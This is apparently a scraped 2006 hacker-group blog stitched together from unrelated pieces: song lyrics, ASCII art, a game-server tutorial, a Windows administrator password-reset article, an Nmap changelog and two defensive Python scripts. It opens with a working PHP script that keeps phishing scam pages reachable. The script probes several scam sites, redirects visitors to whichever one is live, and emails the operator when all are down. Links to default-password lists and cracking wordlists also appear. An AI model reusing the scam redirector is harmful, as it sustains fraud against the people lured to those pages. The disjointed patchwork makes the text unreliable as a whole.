
?>




It is more easier to put this code in testmyscam.php for example nad then in redirection script

Code:
function scam_exists($strURL) {
$data = file_get_contents($strURL);
return $data;
}

$conf_word = "exists"; // confirmation word for checker to see if the scam is still alive

$url1 = "hxxp://www.scam1.com/testmyscam.php?session=31337"; // first scam url
$url2 = "hxxp://www.scam2.com/testmyscam.php?session=31337"; // second scam url
$url3 = "hxxp://www.scam3.com/testmyscam.php?session=31337"; // third scam url (actually you can add as much as you like, but don't forget to add equal number of "elseif"

if(scam_exists($url1) == $conf_word) {
$url1 = str_replace("testmyscam.php?session=31337","", $url1); // str_replace("?session=31337","YOU_CAN_PUT_HERE_WHATEVER_YOU_NEED_TO", $url1);
header("Location: $url1");
}

elseif(scam_exists($url2) == $conf_word) {
$url2 = str_replace("testmyscam.php?session=31337","", $url2);
header("Location: $url2");
}

elseif(scam_exists($url3) == $conf_word) {
$url3 = str_replace("testmyscam.php?session=31337","", $url3);
header("Location: $url3");
}

else {
@mail('your@email.com','Scams report','All your scams are offline'); // or send mail to you if all scams are offline
header("Location: hxxp://editme.com"); // any site where people should be redirected if all scams are offline
}
?>

Just put testmyscam.php in your scam dir, no need for puting scam in scam page Smiley
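
For whoever operates a web server that ends up hosting such a page, the check described in this thread leaves a recognizable trace in the access log: one client repeatedly requests the same URL with a fixed query string and always gets back the same few bytes, while the same path serves a full page to everyone else. The following is an added example, not code from the original posts; the log lines, IP addresses, paths, function names and thresholds are constructed for illustration, and only the `?session=31337` parameter and the 6-byte `exists` reply come from the thread.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Apr/2006:11:00:01 +0000] "GET /images/login/index.php?session=31337 HTTP/1.0" 200 6 "-" "-"',
    '203.0.113.20 - - [30/Apr/2006:11:00:02 +0000] "GET /images/login/index.php HTTP/1.1" 200 8421 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [30/Apr/2006:11:03:40 +0000] "GET /images/login/index.php?session=31337 HTTP/1.0" 200 6 "-" "-"',
    '192.0.2.10 - - [30/Apr/2006:11:04:00 +0000] "GET /health?probe=1 HTTP/1.1" 200 2 "-" "monitor/1.0"',
    '192.0.2.10 - - [30/Apr/2006:11:05:00 +0000] "GET /health?probe=1 HTTP/1.1" 200 2 "-" "monitor/1.0"',
    '198.51.100.7 - - [30/Apr/2006:11:05:12 +0000] "GET /images/login/index.php?session=31337 HTTP/1.0" 200 6 "-" "-"',
    '192.0.2.10 - - [30/Apr/2006:11:06:00 +0000] "GET /health?probe=1 HTTP/1.1" 200 2 "-" "monitor/1.0"',
    '203.0.113.21 - - [30/Apr/2006:11:06:30 +0000] "GET /search.php?q=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'this line is malformed and must be skipped',
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    parts = urlsplit(rec["target"])
    rec["path"], rec["query"] = parts.path, parts.query
    return rec


def find_liveness_probes(lines, max_body=16, min_hits=3, gate_ratio=10):
    """Flag (client, URL) pairs that look like scripted liveness checks.

    Base condition: the same client requests the same path and query at least
    `min_hits` times and every 200 response has the same body of at most
    `max_body` bytes. A pair is reported only if it also shows at least one of:
      no_user_agent - no User-Agent on any hit (PHP's HTTP wrapper sends none
                      unless the user_agent setting is configured)
      param_gated   - the same path without a query string serves a body at
                      least `gate_ratio` times larger to other requests
    """
    groups = defaultdict(list)
    largest_plain = defaultdict(int)  # path -> largest 200 body served without a query
    for rec in filter(None, map(parse_line, lines)):
        if rec["status"] != 200:
            continue
        if rec["query"]:
            groups[(rec["ip"], rec["path"], rec["query"])].append(rec)
        else:
            largest_plain[rec["path"]] = max(largest_plain[rec["path"]], rec["size"])

    findings = []
    for (ip, path, query), hits in groups.items():
        sizes = {h["size"] for h in hits}
        if len(hits) < min_hits or len(sizes) != 1:
            continue
        size = sizes.pop()
        if size > max_body:
            continue
        signals = []
        if all(h["ua"] in ("", "-") for h in hits):
            signals.append("no_user_agent")
        if largest_plain.get(path, 0) >= gate_ratio * max(size, 1):
            signals.append("param_gated")
        if signals:  # a plain health check with a real User-Agent is not reported
            findings.append({"ip": ip, "path": path, "query": query,
                             "hits": len(hits), "size": size, "signals": signals})
    return sorted(findings, key=lambda f: (-f["hits"], f["path"]))


if __name__ == "__main__":
    for finding in find_liveness_probes(SAMPLE_LOG):
        print(finding)
```

A hit on an otherwise legitimate site usually means the path holds uploaded content that should be reviewed and removed, and the probing client address is worth reporting to its hosting provider.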

Xt0rti0n-Team Business Week.

# # # #
# # # #
# ## #### ## #
## ## ###### ## ##
## ## ###### ## ##
## ## #### ## ##
### ############ ###
########################
##############
######## ########## #######
### ## ########## ## ###
### ## ########## ## ###
### # ########## # ###
### ## ######## ## ###
## # ###### # ##
## # #### # ##
## ##

woke up this morning

You woke up this morning
Got yourself a gun,
Mama always said you'd be
The Chosen One.

She said: You're one in a million
You've got to burn to shine,
But you were born under a bad sign,
With a blue moon in your eyes.

You woke up this morning
All the love has gone,
Your Papa never told you
About right and wrong.

But you're looking good, baby,
I believe you're feeling fine, (shame about it),
Born under a bad sign
With a blue moon in your eyes.

You woke up this morning
The world turned upside down,
Thing's ain't been the same
Since the Blues walked into town.

But you're one in a million
You've got that shotgun shine.
Born under a bad sign,
With a blue moon in your eyes.

When you woke up this morning everything you had was
gone. By half past ten your head was going ding-dong.
Ringing like a bell from your head down to your toes,
like a voice telling you there was something you should
know. Last night you were flying but today you're so low
- ain't it times like these that make you wonder if
you'll ever know the meaning of things as they appear to
the others; wives, mothers, fathers, sisters and
brothers. Don't you wish you didn't function, wish you
didn't think beyond the next paycheck and the next little
drink' Well you do so make up your mind to go on, 'cos
when you woke up this morning everything you had was gone.

When you woke up this morning,
When you woke up this morning,
When you woke up this morning,
Mama said you'd be the Chosen One.

When you woke up this morning,
When you woke up this morning,
When you woke up this morning,
You got yourself a gun.

Cyber-Crime.

Look at this, there is a forum for researching cyber crime hehe.
http://forum.crime-research.org/

Saturday, April 22, 2006

System Of A Down - Lonely Day.

VNC Port.

http://www.iss.net/security_center/advice/Exploits/Ports/

5800 VNC
5801 VNC
5900 VNC
5901 VNC

Default Passwords.

http://www.phenoelit.de/dpl/dpl.html

Setting Up a CS Server.

# Tutorial by ZueR4_

I recommend creating a user solely for running the server:

# useradd cs



As the 'cs' user, you will do everything else:

# su cs



I usually install in the 'cs' user's home directory:

$ cd ~



Let's download Half-Life:

$ wget hlds_l_3111_full.bin



List of some mirrors:
http://mirror.redphive.org/hlds_l_3111_full.bin
http://www.fileshack.com/file.x?fid=186
http://download.boomtown.net/pacth_...ds_3111_full_uk
http://www.fileplanet.com/files/50000/58368.shtml

We will install HL:

$ ./hlds_l_3111_full.bin


-> Follow the installation instructions.

Let's download Counter-Strike:

$ cd ~/hlds_l
$ wget cs_15_full.tar.gz



List of some mirrors:
http://www.fileplanet.com/index.asp?section=1854&file=58481
http://www.jetstreamgames.co.nz/files/.../cs_15_full.tar.gz
http://www.heyphucker.com/cs.php
ftp://ftp.gamesdomain.co.uk/pub/.../cs_15_full.tar.gz
http://www.adrenaline.com.br/downloads/.../cs_15_full.tar.gz

We will now unpack the Counter-Strike MOD:

$ gunzip cs_15_full.tar.gz
$ tar -xvf cs_15_full.tar



Done! You now have all the files needed to run the server.

Let's add the Half-Life directory to the environment:

$ export LD_LIBRARY_PATH=/home/cs/hlds_l:$LD_LIBRARY_PATH



To run the server, here is the required syntax:

$ ./hlds_run -game cstrike +ip -port +maxplayers +map



Example:

$ ./hlds_run -game cstrike +ip 200.123.123.123 -port 27015 +maxplayers 16 +map de_aztec



The default port is 27015; we specify it here in case we need to open another server in the future.

* Some important configuration files:
cstrike/server.cfg (Contains all the server settings)
cstrike/mapcycle.txt (Contains the list of maps that will "run" on the server)
cstrike/motd.txt (Message Of The Day)

Well, I imagine you are using some firewall rules, so below are the rules needed for users to be able to play on your server.

I don't remember the purpose of each port; I only remember that one of them is for authentication with Won.net.

# iptables -A INPUT -s 0.0.0.0/0 -p udp --dport 27015 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27012 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27010 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p udp --sport 27005 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 7002 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 5273 -j ACCEPT
# iptables -A OUTPUT -s 0.0.0.0/0 -p tcp --sport 27040 -j ACCEPT



Tip

For a good time, it is strongly recommended to have an administrator on the server. This administration can be done through the 'rcon' (Remote Control) command.

Just specify a password in 'server.cfg', for example:

rcon_password "zueragostoso"



Now, whoever is going to administer the server must first of all type the same command in the Console ("):

$ rcon_password "zueragostoso"



This way you have supplied the password; now just type the server command with "rcon " in front.
Example: // Change map

$ rcon changelevel de_dust

m0rtix.

http://m0rtix.netmisphere2.com/about.htm
http://xpl.netmisphere2.com/
http://exploitlabs.com/advisories.html
http://atticunderground.com/

HackersCenter...

http://www.hackerscenter.com/

WordLists.

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists

Windows Password.

http://www.petri.co.il/forgot_administrator_password.htm

How can I gain access to a Windows NT/2000/XP/2003 computer if I forgot the administrator's password? How can I reset the administrator's password if I forgot it?

Ok, so you say you forgot your Windows administrator's password, huh? Oh well, it doesn't really matter if you did or you just say you did. The fact is that you need to gain access to a computer and you cannot "remember" the administrator's password.

How can you get out of this situation without formatting and re-installing the operating system?

One method of gaining access to the system is by trying hard to remember the forgotten password, or a password of another user which has the same level of administrative rights. However, I don't think this approach will help you, otherwise you wouldn't be sitting here reading this article, would you?

Another method is by trying to restore a backed up System State (in Windows 2000/XP/2003) or an ERD (in NT 4.0) in which you do remember the password. The problem with doing so is that you'll probably lose all of the recently added users and groups, and all the changed passwords for all of your users since the last backup was made.

A third method might be to install a parallel operating system on a different partition on the same computer, then use a simple trick to gain access to the old system. Read more about it on my Forgot the Administrator's Password? - Alternate Logon Trick article.

Note: If you are looking for password cracking tools that can be used for miscellaneous objectives such as password-protected PDF documents, zipped archives, Office documents, BIOS protection and so on then this page is NOT for you. See some links at the bottom of this page for hints on where to find such tools, but I can tell you right away that Google might be a better choice for you.

The fourth option is by using 3rd party tools that will enable you to reset the lost password and logon with a blank password.

Update: You can also discuss these topics on the dedicated Petri.co.il Forgot Admin Password Forum.
Translations of this article

There are some translations made of this article. Here are the ones I am aware of (do tell me if you know of another, or if you want to create one in your language):

* Portuguese - HERE is an excellent translation of this article into Portuguese (by Bruno Koga - Thanks!)
* Serbian - HERE (by Aleksandar Stojilkovic - thanks!)

Free Tools

Here are some of these tools:

Free Windows password-cracking tools are usually Linux boot disks that have NT file system (NTFS) drivers and software that will read the registry and rewrite the password hashes for any account including the Administrators. This process requires physical access to the console and an available floppy drive but it works like a charm! I've done it myself several times with no glitch or problem whatsoever.

Beware!!! Resetting a user's or administrator's password on some systems (like Windows XP) might cause data loss, especially EFS-encrypted files and saved passwords from within Internet Explorer. To protect yourself against EFS-encrypted files loss you should always export your Private and Public key, along with the keys for the Recovery Agent user. Please read more about EFS on my What's EFS? page. Out of the following list, the only tool that will not cause any harm to EFS-encrypted files on your hard disk is the Windows Password recovery system.

Here are 5 of these free tools:

1. Windows Password recovery - Can retrieve forgotten admin and users' passwords in minutes. Safest possible option, does not write anything to hard drive.
2. Petter Nordahl-Hagen's Offline NT Password & Registry Editor - A great boot CD/Floppy that can reset the local administrator's password.
3. Openwall's John the Ripper - Good boot floppy with cracking capabilities.
4. EBCD – Emergency Boot CD - Bootable CD, intended for system recovery in the case of software or hardware faults.
5. Austrumi - Bootable CD for recovering passwords and other cool tools.

If you happen to know about other free tools please let me know.

Note: These password resetting tools are usually good for local users on a stand alone computer. For Domain Admin password resetting procedures please see the Related Articles section at the bottom of this page.

Note: I'd like to put together all the info you have about these issues. If you have any tips, recommended links or any ideas about how to figure out a lost password - please e-mail me and I'll get back to you .
Windows Password recovery

http://www.loginrecovery.com

This site provides a tool to recover lost Windows XP passwords. It works for administrator and user accounts, it doesn't change the password just tells you the old one. It works with encrypted files (EFS) and password hashes. It even works if no passwords at all are known for the machine (as long as you have another computer with internet access to view this website with).

Author claims it also works with Windows NT and Windows Server 2003 and Windows Longhorn, but the BEST thing about it is the fact that it won't reset your passwords, but simply reveal them for you to remember and then use.

Give it a try. The author would like to receive feedback. There is a free service as well as a priority service that will retrieve your passwords within minutes. The fee for the priority service is very cheap, and is really just to cover server costs.

Note: You'll need a blank floppy to run the process.

Update: Author now offers the same tool as a CD image for those of you who do not have a floppy in their computer.

Usage, instructions and additional information can be found at

http://www.loginrecovery.com
Offline NT Password & Registry Editor (v050303)

Petter Nordahl-Hagen has written a Windows NT/2000/XP offline password editor:

http://home.eunet.no/~pnordahl/ntpasswd

* This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003 system, by modifying the encrypted password in the registry's SAM file.
* You do not need to know the old password to set a new one.
* It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.
* Works with syskey (no need to turn it off, but you can if you have lost the key)
* Will detect and offer to unlock locked or disabled out user accounts!

Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!

Download links:

* bd050303.zip (~1.1MB) - Bootdisk image, date 050303.
* cd050303.zip (~3MB) - Bootable CD image with same version and drivers as floppies above
* sc050303.zip (~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)

To write these images to a floppy disk you'll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.

Support and Problems? Don't call me! Talk to the creator of this great tool. He also has a good FAQ set up covering most of the day-to-day questions. Read it right HERE

Author claims that this tool was successfully tested on NT 3.51, NT 4, Windows 2000 (except datacenter), Windows XP (all versions) and Windows Server 2003. Notice that it is NOT compatible with Active Directory.

Need to change Windows NT/2000 Domain Admin password? This tool, however useful, will only reset the local administrator's password (e.g. the one found in the local computer's SAM). To reset a password of a domain administrator (or any other user for that matter) you must perform the routine that is described in the following page: Forgot the Administrator's Password? - Reset Domain Admin Password in Windows 2000 AD.

Note: The above trick will probably not work under Windows Server 2003 due to service account security changes. To work around these limitations please read the Forgot the Administrator's Password? - Reset Domain Admin Password in Windows Server 2003 AD page.
John the Ripper (v1.6)

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Read more at http://www.openwall.com/john

Download links:

John the Ripper 1.6 (768kb)
EBCD – Emergency Boot CD (v0.60)

EBCD is a bootable CD, intended for system recovery in the case of software or hardware faults. It is able to create backup copies of normally working system and restore system to saved state. It contains the best system software ever created, properly compiled and configured for the maximum efficient use.

EBCD will be very useful when you need to:

* Copy/move files (with long names, not necessary in CP437 encoding) from/to the disk but OS which can handle them (windows, Linux...) cannot boot. In particular, you may create a backup copy of normally installed and configured Windows and later restore Windows from such backup copy. So, in the case of fault OS itself and all software and its settings can be restored in 5-10 minutes.
* Perform emergency boot of Windows NT / 2000 / XP. When the loader of this OS on the hard disk is damaged or misconfigured, you are able to load OS using another, standalone loader from this CD.
* Recover master boot record of HDD. This allows to boot OS after incorrect uninstallation of custom loader (LILO, for example), which made all OS on your PC not bootable.
* Delete, move, copy to file (image) and re-create partition from file. Image transfer over network is also supported: so you may configure one PC and then make contents of hard disks of other PCs same as contents of the hard disk of the first one.
* Change password of any user, including administrator of Windows NT/2000/XP OS. You do not need to know the old password.
* Recover deleted file, even file re-deleted from Windows Recycle Bin, and, in contrast, wipe single file or a whole disk so that it will be impossible to recover it in any way.
* Recover data from accidentally formatted disk. Sometimes it helps to recover data from the disk, damaged by a virus.
* Recover data from a floppy disk, which is not readable by OS. Format 3.5" disk for 1.7 Mb size.

Also the disk includes full set of external DOS commands, console versions of the most popular archivers/compressors.

Moreover, emergency boot CD includes minimal Linux distribution (Rescue Linux distribution) which may be very useful to a professional user.

Read more at http://ebcd.pcministry.com

Download links:

EBCD Pro distribution (18mb)

More download links: HERE, HERE, HERE, HERE and HERE. One of them has got to work, and if not, please send me a note.
Austrumi (v0.9.2 - December 2004)

Austrumi is a Linux bootable ISO image for recovering NT passwords and other cool tools and methods, sized for Business Card size CD media (50Mb). It allows you to change any password, including that of the Administrator, on a partition occupied by Windows NT, Windows 2000 or Windows XP. Simply boot the CD and when you get to the initial boot prompt, type:

boot: nt_pass

This will launch a console utility that will detect Windows partitions on the hard disk and provide you with a menu to modify any user or Administrator passwords on the Windows system. It will even give access to the Windows registry for recovery purposes. Quite a handy utility to keep in your wallet (AUSTRUMI is small enough to fit on a business card-size CD) if you are unfortunate enough to having to deal with Windows machines in your line of work.

Read more at http://sourceforge.net/projects/austrumi

Download links:

Austrumi v0.9.2 (ISO file, 50.9mb)

Xt0rti0n-Team is watching you...

Mercosider.com.br

Friday, April 21, 2006

Post from a lamer...

WALDYHESTER
25/03/2004, 12:46
Hello everyone... I am the administrator of a computer school (I have been working here for three months); they hired me to replace an administrator who used to fool around together with this student. There is a student here who always gets around the Windows XP login system (as soon as Windows XP starts, 'administrator' and 'guest' appear; this student manages to log in as administrator and download and install a bunch of programs, viruses, etc.). I am sure he does not know the password, because I change it every day, on all the machines.
I need to have this system so that I do not have to format the machine every four days. I cannot use any control software that is not free, because the owner of the school is not willing to invest in this.

I would like to know how he does this, and what I can do so that he does not 'get around' this login...

WinXP tip

http://www.infowester.com/dicaswxp.php

TrueCrypt 4.2 Linux.

We are pleased to announce that TrueCrypt 4.2 has been released. Among the new features is the ability to create a TrueCrypt volume under Linux, ability to create a ‘dynamic’ container whose physical size (actual disk space used) grows as new data is added to it, ability to change volume passwords/keyfiles under Linux, ability to create keyfiles under Linux, ability to restore and backup volume headers under Linux, and many more.

This release makes the Linux version of TrueCrypt completely independent of the Windows version. However, both versions will continue to be mutually compatible. For a comprehensive list of changes, please see http://www.truecrypt.org/history.php

the best crypt program!
+ DriveCrypt Plus Pack - and cops will be suck

I use this with my USB Drive... Like a dream

Best Solution ... don't forget to wipe your cache ...

Sites BR.


Nmap Changelog

# Nmap Changelog ($Id: CHANGELOG,v 1.233 2005/02/05 22:37:54 fyodor Exp $)

Nmap 3.81

o Nmap now ships with and installs (in the same directory as other
data files such as nmap-os-fingerprints) an XSL stylesheet for
rendering the XML output as HTML. This stylesheet was written by
Benjamin Erb ( see http://www.benjamin-erb.de/nmap/ for examples).
It supports tables, version detection, color-coded port states, and
more. The XML output has been augmented to include an
xml-stylesheet directive pointing to nmap.xsl on the local
filesystem. You can point to a different XSL file by providing the
filename or URL to the new --stylesheet argument. Omit the
xml-stylesheet directive entirely by specifying --no-stylesheet.
The XML to HTML conversion can be done with an XSLT processor such
as Saxon, Sablot, or Xalan, but modern browsers can do this on the
fly -- simply load the XML output file in IE or Firefox. Some
features don't currently work with Firefox's on-the-fly rendering.
Perhaps some Mozilla wizard can fix that in either the XSL or the
browser itself. I hate having things work better in IE :). It is
often more convenient to have the stylesheet loaded from a URL
rather than the local filesystem, allowing the XML to be rendered on
any machine regardless of whether/where the XSL is installed. For
privacy reasons (avoid loading of an external URL when you view
results), Nmap uses the local filesystem by default. If you would
like the latest version of the stylesheet loaded from the web when
rendering, specify
--stylesheet http://www.insecure.org/nmap/data/nmap.xsl .

o Fixed fragmentation option (-f). One -f now sends fragments
with just 8 bytes after the IP header, while -ff sends 16 bytes to
reduce the number of fragments needed. You can specify your own
fragmentation offset (must be a multiple of 8) with the new --mtu
flag. Don't also specify -f if you use --mtu. Remember that some
systems (such as Linux with connection tracking) will defragment in
the kernel anyway -- so test first while sniffing with ethereal.
These changes are from a patch by Martin Mačok
(martin.macok(a)underground.cz).

o Nmap now prints the number (and total bytes) of raw IP packets sent
and received when it completes, if verbose mode (-v) is enabled. The
report looks like:
Nmap finished: 256 IP addresses (3 hosts up) scanned in 30.632 seconds
Raw packets sent: 7727 (303KB) | Rcvd: 6944 (304KB)

o Fixed (I hope) an error which would cause the Windows version of
Nmap to abort under some circumstances with the error message
"Unexpected error in NSE_TYPE_READ callback. Error code: 10053
(Unknown error)". Problem reported by "Tony Golding"
(biz(a)tonygolding.com).

o Added new "closed|filtered" state. This is used for Idlescan, since
that scan method can't distinguish between those two states. Nmap
previously just used "closed", but this is more accurate.

o Null, FIN, Maimon, and Xmas scans now mark ports as "open|filtered"
instead of "open" when they fail to receive any response from the
target port. After all, it could just as easily be filtered as open.
This is the same change that was made to UDP scan in 3.70. Also as
with UDP scan, adding version detection (-sV) will change the state
from open|filtered to open if it confirms that they really are open.

o Fixed a bug in ACK scan that could cause Nmap to crash with the
message "Unexpected port state: 6" in some cases. Thanks to Glyn
Geoghegan (glyng(a)corsaire.com) for reporting the problem.

o Change IP protocol scan (-sO) so that a response from the target
host in any protocol at all will prove that protocol is open. As
before, no response means "open|filtered", an ICMP protocol
unreachable means "closed", and most other ICMP error messages mean
"filtered".

o Patched a Winpcap issue that prevented read timeouts from being
honored on Solaris (thus slowing down Nmap substantially). The
problem report and patch were sent in by Ben Harris
(bjh21(a)cam.ac.uk).

o Changed IP protocol scan (-sO) so that it sends valid ICMP, TCP, and
UDP headers when scanning protocols 1, 6, and 17, respectively. An
empty IP header is still sent for all other protocols. This should
prevent the error messages such as "sendto in send_ip_packet:
sendto(3, packet, 20, 0, 192.31.33.7, 16) => Operation not
permitted" that Linux (and perhaps other systems) would give when
they try to interpret the raw packet. This also makes it more
likely that these protocols will elicit a response, proving that the
protocol is "open".

o The windows build now uses header and static library files from
Winpcap 3.1Beta4. It also now prints out the DLL version you are
using when run with -d. I would recommend upgrading to 3.1Beta4 if
you have an older Winpcap installed.

o Added an NTP probe and matches to the version detection database
(nmap-service-probes) thanks to a submission from Martin
Mačok (martin.macok@underground.cz).

o Applied several Nmap service detection database updates sent in by
Martin Mačok (martin.macok(a)underground.cz).

o The XML nmaprun element now has a startstr attribute which gives the
human readable calendar time format that a scan started. Similarly
the finished element now has a timestr attribute describing when the
scan finished. These are in addition to the existing nmaprun/start
and finished/time attributes that provided the start and finish time
in UNIX time_t notation. This should help in development of
XSLT stylesheets for Nmap XML output.

o Fixed a memory leak that would generally consume several hundred
bytes per down host scanned. While the effect for most scans is
negligible, it was overwhelming when Scott Carlson
(Scott.Carlson(a)schwab.com) tried to scan 24 million IPs
(10.0.0.0/8). Thanks to him for reporting the problem. Also thanks
to Valgrind ( http://valgrind.kde.org ) for making it easy to debug.

o Fixed a crash on Windows systems that don't include the iphlpapi
DLL. This affects Win95 and perhaps other variants. Thanks to Ganga
Bhavani (GBhavani(a)everdreamcorp.com) for reporting the problem and
sending the patch.

o Ensured that the device type, os vendor, and os family OS
fingerprinting classification values are scrubbed for XML compliance
in the XML output. Thanks to Matthieu Verbert
(mve(a)zurich.ibm.com) for reporting the problem and sending a patch.

o Rewrote the host IP (target specification) parser for easier
maintenance and to fix a bug found by Netris (netris(a)ok.kz)

o Changed the Nmap XML DTD to use the same xmloutputversion (1.01) as
newer versions of Nmap. Thanks to Laurent Estieux
(laurent.estieux(a)free.fr) for reporting the problem.

o Fixed compilation on some HP-UX 11 boxes thanks to a patch by Petter
Reinholdtsen (pere(a)hungry.com).

o Fixed a portability problem on some OpenBSD and FreeBSD machines
thanks to a patch by Okan Demirmen (okan(a)demirmen.com).

o Applied Martin Mačok's (martin.macok(a)underground.cz) "cosmetics
patch", which fixes a few typos and minor problems.
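
An added example (not part of the Nmap changelog or the Nmap project's code): a short Python reader for the XML output discussed in the 3.81 entries, which picks up the `startstr`/`timestr` attributes and the MAC `address` element and keeps "open|filtered" and "closed|filtered" apart from confirmed "open" ports when building an inventory. The sample XML is constructed, and the names `parse_scan` and `triage` are hypothetical.

```python
import xml.etree.ElementTree as ET

# Constructed sample (not real scan output). 192.0.2.10 is a documentation
# address; the MAC/vendor pair is the one quoted in the changelog text.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" start="1108246800" startstr="Sat Feb 12 22:20:00 2005" version="3.81" xmloutputversion="1.01">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <address addr="00:A0:CC:63:85:4B" addrtype="mac" vendor="Lite-on Communications"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="udp" portid="123"><state state="open|filtered"/><service name="ntp"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/></port>
      <port protocol="tcp" portid="23"><state state="closed|filtered"/></port>
      <port protocol="tcp" portid="25"><state state="filtered"/></port>
    </ports>
  </host>
  <runstats><finished time="1108246831" timestr="Sat Feb 12 22:20:31 2005"/></runstats>
</nmaprun>
"""

# States that mean "no definite answer", per the changelog entries.
AMBIGUOUS_STATES = {"open|filtered", "closed|filtered"}


def _attr(element, name):
    """Return an attribute value, or None when the element is absent."""
    return element.get(name) if element is not None else None


def parse_scan(xml_text):
    """Parse Nmap XML (assumed to be output you produced yourself) into a dict."""
    root = ET.fromstring(xml_text)
    finished = root.find("runstats/finished")
    report = {
        # Prefer the human-readable attributes, fall back to the time_t values.
        "started": root.get("startstr") or root.get("start"),
        "finished": _attr(finished, "timestr") or _attr(finished, "time"),
        "hosts": [],
    }
    for host in root.findall("host"):
        by_type = {a.get("addrtype"): a for a in host.findall("address")}
        ip = by_type.get("ipv4")
        if ip is None:
            ip = by_type.get("ipv6")
        mac = by_type.get("mac")  # only reported for directly connected hosts
        ports = []
        for port in host.findall("ports/port"):
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": _attr(port.find("state"), "state") or "unknown",
                "service": _attr(port.find("service"), "name"),
            })
        report["hosts"].append({
            "ip": _attr(ip, "addr"),
            "mac": _attr(mac, "addr"),
            "vendor": _attr(mac, "vendor"),
            "ports": ports,
        })
    return report


def triage(report):
    """Split ports into confirmed listeners and ones that need a follow-up check."""
    confirmed, ambiguous = [], []
    for host in report["hosts"]:
        for p in host["ports"]:
            key = (host["ip"], p["proto"], p["port"])
            # Exact match: a substring test such as '"open" in state' would
            # wrongly count "open|filtered" as a confirmed listener.
            if p["state"] == "open":
                confirmed.append(key)
            elif p["state"] in AMBIGUOUS_STATES:
                ambiguous.append(key + (p["state"],))
    return confirmed, ambiguous


if __name__ == "__main__":
    scan = parse_scan(SAMPLE_XML)
    open_ports, unclear = triage(scan)
    print("scan window:", scan["started"], "->", scan["finished"])
    print("confirmed open:", open_ports)
    print("needs follow-up:", unclear)
```
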

Nmap 3.75

o Implemented a huge OS fingerprint database update. The number of
fingerprints increased more than 20% to 1,353 and many of the
existing ones are much improved. Notable updates include the fourth
edition of Bell Lab's Plan9, Grandstream's BugeTone 101 IP Phone,
and Bart's Network Boot Disk 2.7 (which runs MS-DOS). Oh, and Linux
kernels up to 2.6.8, dozens of new Windows fingerprints including XP
SP2, the latest Longhorn warez, and many modified Xboxes, OpenBSD
3.6, NetBSD up to 2.0RC4, Apple's AirPort Express WAP and OS X
10.3.3 (Panther) release, Novell Netware 6.5, FreeBSD 5.3-BETA, a
bunch of Linksys and D-Link consumer junk, the latest Cisco IOS 12.2
releases, a ton of miscellaneous broadband routers and printers, and
much more.

o Updated nmap-mac-prefixes with the latest OUIs from the IEEE.
[ http://standards.ieee.org/regauth/oui/oui.txt ]

o Updated nmap-protocols with the latest IP protocols from IANA
[ http://www.iana.org/assignments/protocol-numbers ]

o Added a few new Nmap version detection signatures thanks to a patch
from Martin Mačok (martin.macok(a)underground.cz).

o Fixed a crash problem in the Windows version of Nmap, thanks to a
patch from Ganga Bhavani (GBhavani(a)everdreamcorp.com).

o Fixed Windows service scan crashes that occur with the error message
"Unexpected nsock_loop error. Error code 10022 (Unknown error)". It
turns out that Windows does not allow select() calls with all three
FD sets empty. Lame. The Linux select() man page even suggests
calling "select with all three sets empty, n zero, and a non-null
timeout as a fairly portable way to sleep with subsecond precision."
Thanks to Gisle Vanem (giva(a)bgnett.no) for debugging help.

o Added --max_scan_delay parameter. Nmap will sometimes increase the
delay itself when it detects many dropped packets. For example,
Solaris systems tend to respond with only one ICMP port unreachable
packet per second during a UDP scan. So Nmap will try to detect
this and lower its rate of UDP probes to one per second. This can
provide more accurate results while reducing network congestion, but
it can slow the scans down substantially. By default (with no -T
options specified), Nmap allows this delay to grow to one second per
probe. This option allows you to set a lower or higher maximum.
The -T4 and -T5 scan modes now limit the maximum scan delay for TCP
scans to 10 and 5 ms, respectively.

o Fixed a bug that prevented RPC scan (-sR) from working for UDP ports
unless service detection (-sV) was used. -sV is still usually a
better approach than -sR, as the latter ONLY handles RPC. Thanks to
Stephen Bishop (sbishop(a)idsec.co.uk) for reporting the problem and
sending a patch.

o Fixed nmap_fetchfile() to better find custom versions of data files
